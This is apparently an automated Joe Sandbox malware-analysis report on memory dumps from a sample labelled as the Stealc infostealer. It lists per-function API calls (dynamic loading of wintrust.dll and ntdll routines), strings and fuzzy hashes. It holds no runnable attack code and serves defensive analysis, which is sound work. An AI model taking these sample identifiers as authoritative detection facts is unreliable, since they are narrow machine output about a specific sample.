Opcode Fuzzy Hash: b15012a4314a41fff666871e01c5908c68aea9ae3bd94bb841b84f7eb84eb96a
Instruction Fuzzy Hash: 07212539700541E7DB149FE9C819F4B73B5EB8632EF11852AD82147B40C72CA882CAD1

Function 6C12A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14F770,-00000001,?,6C13E330,?,6C0EBDF7), ref: 6C12A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C0EBDF7), ref: 6C12A7C2
moz_xmalloc.MOZGLUE(00000018,?,6C0EBDF7), ref: 6C12A7E4
LeaveCriticalSection.KERNEL32(6C14F770), ref: 6C12A80A

Strings

accelerator.dll, xrefs: 6C12A7BF

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 390cf76f7565fea532b832d60156ce5b07ea34df5a73a98accfa951bd355d792
Instruction ID: 4cf0e0fd37a7086644e3e39f5e4ac84dc24df967fa1224388165b25116e283e0
Opcode Fuzzy Hash: 390cf76f7565fea532b832d60156ce5b07ea34df5a73a98accfa951bd355d792
Instruction Fuzzy Hash: 1C01ADB56003049FEB04DF99D884D15BBF8FB8A32A705C06AE9198B701DB75A800CBA0

Function 6C0CF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C0CEE51,?), ref: 6C0CF0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C0CF0C2

Strings

Could not find CoTaskMemFree, xrefs: 6C0CF0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C0CF0DC
ole32, xrefs: 6C0CF0AD

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 772861e08c210320d111d4686aafb22be085dc011b1b6217c527452d1d83537e
Instruction ID: d851baa00caeb78c1fdb244774dfcab48e33b1edcb38384b8d17a5636df10c46
Opcode Fuzzy Hash: 772861e08c210320d111d4686aafb22be085dc011b1b6217c527452d1d83537e
Instruction Fuzzy Hash: 46E04FB07456019BAF14AAA6981CF2E3BFD6B52A4D374C42DE522D1F40EA30D4109663

Function 6C100080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7204), ref: 6C100088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C1000A7
FreeLibrary.KERNEL32(?,6C0D7204), ref: 6C1000BE

Strings

wintrust.dll, xrefs: 6C100083
CryptCATAdminAcquireContext2, xrefs: 6C1000A1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: eb2c31ae08aa428615ea71888332adab87834487c7b7304cb973698174758321
Instruction ID: d7e7fa8598b89efa0ec72dfd81172213f4179e53ed3ef14f7c17616c14ca5063
Opcode Fuzzy Hash: eb2c31ae08aa428615ea71888332adab87834487c7b7304cb973698174758321
Instruction Fuzzy Hash: 3EE09274745B069BEF10BF66D808B057AF8A75B38DF50C016E924D6750DBB5C020AB21

Function 6C1000D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7235), ref: 6C1000D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C1000F7
FreeLibrary.KERNEL32(?,6C0D7235), ref: 6C10010E

Strings

wintrust.dll, xrefs: 6C1000D3
CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C1000F1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 25817198255ba186b325bb1c94e9b846bc7a40c83c208ad4c960b43c4a6ed533
Instruction ID: 91b2973e5a675992968eb6c3017e75269a89a3ada40312e84c50feda94b1b6a4
Opcode Fuzzy Hash: 25817198255ba186b325bb1c94e9b846bc7a40c83c208ad4c960b43c4a6ed533
Instruction Fuzzy Hash: 28E0B67474570B9BEF00BF66C909F267AF9A74724DF60C015A96A95B41DBB4C060EB10

Function 6C100120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7297), ref: 6C100128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C100147
FreeLibrary.KERNEL32(?,6C0D7297), ref: 6C10015E

Strings

wintrust.dll, xrefs: 6C100123
CryptCATAdminEnumCatalogFromHash, xrefs: 6C100141

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 5d4b05d7aec57d2a0164b53c0b74fdbb95837d92171c62451d9a01792bd34a3d
Instruction ID: 5bb6b6c8bf9afedc7f9c2259be0fe1cf8c777d4c784e49af5e45ba6bd2e2ae04
Opcode Fuzzy Hash: 5d4b05d7aec57d2a0164b53c0b74fdbb95837d92171c62451d9a01792bd34a3d
Instruction Fuzzy Hash: F3E01A707056469BEF00BF2AC80CB067AF8A75330DF50C015A925DA700DB71C024AB50

Function 6C100170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7308), ref: 6C100178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C100197
FreeLibrary.KERNEL32(?,6C0D7308), ref: 6C1001AE

Strings

wintrust.dll, xrefs: 6C100173
CryptCATCatalogInfoFromContext, xrefs: 6C100191

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 962c18d26f4f089e2d5e319c0395d104c7785c30259915018bf7c5a485989e08
Instruction ID: 7c8eb86e1f8b5171e31ccae9041c69d6886b1c97557a33f30d55bfaf20950ff2
Opcode Fuzzy Hash: 962c18d26f4f089e2d5e319c0395d104c7785c30259915018bf7c5a485989e08
Instruction Fuzzy Hash: F8E01A707816869BEF007F25C908B067BF8B74324DF148056E9A595740DB74C0A0AA20

Function 6C1001C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7266), ref: 6C1001C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C1001E7
FreeLibrary.KERNEL32(?,6C0D7266), ref: 6C1001FE

Strings

wintrust.dll, xrefs: 6C1001C3
CryptCATAdminReleaseContext, xrefs: 6C1001E1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 4ed711e8aa1f40f3899b5d5e0818a94fadb421a0358176dd9629fc53b4cb70cc
Instruction ID: b85f2af5eef1f69442bf7217a9e6c70c4cf573f57f9467f66ea1c937adf35ce3
Opcode Fuzzy Hash: 4ed711e8aa1f40f3899b5d5e0818a94fadb421a0358176dd9629fc53b4cb70cc
Instruction Fuzzy Hash: A6E09A747857869BEF00BF668808B167AF8AB6735DF50C419E925D9B81DF74C020AB10

Function 6C12C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C12C0E9), ref: 6C12C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C12C437
FreeLibrary.KERNEL32(?,6C12C0E9), ref: 6C12C44C

Strings

NtQueryVirtualMemory, xrefs: 6C12C431
ntdll.dll, xrefs: 6C12C413

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 7718a1dc52bf1d4197986ecfccdfe98c8223e57e986a5490a108498244d1508a
Instruction ID: c74e552542960d546cb92c3ec9c6cfe58520b426e9202d35fc27bbe79d5a6887
Opcode Fuzzy Hash: 7718a1dc52bf1d4197986ecfccdfe98c8223e57e986a5490a108498244d1508a
Instruction Fuzzy Hash: 7BE0B6746057029BEF007FB6DD18B167BF8A75624CF00D116AA28A9B01EBB4C030AB50

Function 6C1275B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C12748B,?), ref: 6C1275B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C1275D7
FreeLibrary.KERNEL32(?,6C12748B,?), ref: 6C1275EC

Strings

ntdll.dll, xrefs: 6C1275B3
RtlNtStatusToDosError, xrefs: 6C1275D1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: a8defc248a3521328d92aeeed919304fa426b8c6a76ff468aed1d0a4e8e735a7
Instruction ID: eb4dc3a45ff9431c330416eb04f9d007999463af719ddc83f45fff5eefd237b4
Opcode Fuzzy Hash: a8defc248a3521328d92aeeed919304fa426b8c6a76ff468aed1d0a4e8e735a7
Instruction Fuzzy Hash: 72E0B675605701ABEF007FA6C849B06BEF8EB4721EF10D026A925E1701EBBC8091EF51

Function 6C127600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C127592), ref: 6C127608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C127627
FreeLibrary.KERNEL32(?,6C127592), ref: 6C12763C

Strings

ntdll.dll, xrefs: 6C127603
NtUnmapViewOfSection, xrefs: 6C127621

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 4bd39612cb4613f7c87ede92cd7b330e0323c200b01b18c7f7738caedd83abcc
Instruction ID: 56108ea7e2957fe6727704ab08ca78dba20cbe12cf179e85002d4ec415a2aaa5
Opcode Fuzzy Hash: 4bd39612cb4613f7c87ede92cd7b330e0323c200b01b18c7f7738caedd83abcc
Instruction Fuzzy Hash: 29E0B6B8605701ABEF007FA6C808B067EB9E76A35EF01C116E929E1701E7BC8001EF64

Function 6C12C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C12C1DE,?,00000000,?,00000000,?,6C0D779F), ref: 6C12C1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C12C217
FreeLibrary.KERNEL32(?,6C12C1DE,?,00000000,?,00000000,?,6C0D779F), ref: 6C12C22C

Strings

WinVerifyTrust, xrefs: 6C12C211
wintrust.dll, xrefs: 6C12C1F3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 1b87324b7e38cf4afbe7d8c7d69e615970d166348bfb594146a4575c8ca5fa3f
Instruction ID: b984c7665cf8767e3a3716ae4b3e77b960e150351c3f803958150f04ea57af14
Opcode Fuzzy Hash: 1b87324b7e38cf4afbe7d8c7d69e615970d166348bfb594146a4575c8ca5fa3f
Instruction Fuzzy Hash: F8E0ECB4205B429BEF00BF66D91CB067EF8BB5730CF10D515EA24D6785EBB4C061AB51

Function 6C12C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D77F6), ref: 6C12C248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C12C267
FreeLibrary.KERNEL32(?,6C0D77F6), ref: 6C12C27C

Strings

wintrust.dll, xrefs: 6C12C243
CryptCATAdminAcquireContext, xrefs: 6C12C261

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 3b47d215c02ffa91553672e73cdf471f65a75cb8a40630ce639d1433cb019fa5
Instruction ID: 9c7e4ffd79e0f5f591dab35de90e7559233eb7c74b7bad1b3119ccbc24d881fd
Opcode Fuzzy Hash: 3b47d215c02ffa91553672e73cdf471f65a75cb8a40630ce639d1433cb019fa5
Instruction Fuzzy Hash: 68E09274205A0A9BEF04BF66A818B067AF8A75B34CF10D115EA24D6700EBB48464BB60

Function 6C12C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D77C5), ref: 6C12C298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C12C2B7
FreeLibrary.KERNEL32(?,6C0D77C5), ref: 6C12C2CC

Strings

wintrust.dll, xrefs: 6C12C293
CryptCATAdminCalcHashFromFileHandle, xrefs: 6C12C2B1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 6949de3034c597e4825a88346082d5bad0061dab44f1d36ed17a8d4c0f3c79e9
Instruction ID: 250c96b1379d292f599a0a41d70ca68dd0baa1bb1302866e51764289becbf160
Opcode Fuzzy Hash: 6949de3034c597e4825a88346082d5bad0061dab44f1d36ed17a8d4c0f3c79e9
Instruction Fuzzy Hash: E5E0BF74A457029FEF007F6AC918B077FF8E75720CF54C415AA1499B10DB75C024EB50

Function 6C12BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6C0D05BC), ref: 6C12BAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C12BAD7
FreeLibrary.KERNEL32(?,6C0D05BC), ref: 6C12BAEC

Strings

VirtualAlloc2, xrefs: 6C12BAD1
kernelbase.dll, xrefs: 6C12BAB3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 180c6edaf59758dcc7f14bcd668b8473ce2262de402993ca3912b040444386fd
Instruction ID: 7e40208c52582a5945c1db8bfd6761186a2f370e25550d4c2790200b21c7c20c
Opcode Fuzzy Hash: 180c6edaf59758dcc7f14bcd668b8473ce2262de402993ca3912b040444386fd
Instruction Fuzzy Hash: 9BE0B6742057879BDF00BF66C91CB0A7BF8A74620CF14D41AE925A5744EBB98064AB10

Function 6C12BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C12BE49), ref: 6C12BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C12BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C12BE49), ref: 6C12BF38
RtlReAllocateHeap.NTDLL ref: 6C12BF83
RtlFreeHeap.NTDLL(6C12BE49,00000000), ref: 6C12BFA6

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: cacf6024e7e34cada87828ac4d4386ff6946b97c130d293cb007615b1b3eee36
Instruction ID: 84f537ba92f8f23bac49bf68c5bcbacdf9a98330fa89d76ef22a83aed553c53e
Opcode Fuzzy Hash: cacf6024e7e34cada87828ac4d4386ff6946b97c130d293cb007615b1b3eee36
Instruction Fuzzy Hash: 3F51A175A002158FE720CF68CD80BAAB3B2FF98314F294679D516A7B54D738F9468F80

Function 6C118E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?,6C13D734), ref: 6C118E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?,6C13D734), ref: 6C118EBF
free.MOZGLUE(?,?,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?), ref: 6C118F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?,6C13D734), ref: 6C118F46
free.MOZGLUE(?,?,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?), ref: 6C118F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?), ref: 6C118F8F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: f598b3712a446bf3a69bdd42411e3f23eebb9982dbddc580929e0632d415235e
Instruction ID: 691824b17d43421450637a7a11287383fed02f49bbd2e55650ebf907829cac08
Opcode Fuzzy Hash: f598b3712a446bf3a69bdd42411e3f23eebb9982dbddc580929e0632d415235e
Instruction Fuzzy Hash: 6E51C6B5A052168FEB14CF58D88076EB3B2FF45308F16457AD916ABB40E735F904CB91

Function 6C0D60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D60F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D6180
free.MOZGLUE(?,?,?,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D6211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D6229
free.MOZGLUE(?,?,?,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D6271

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

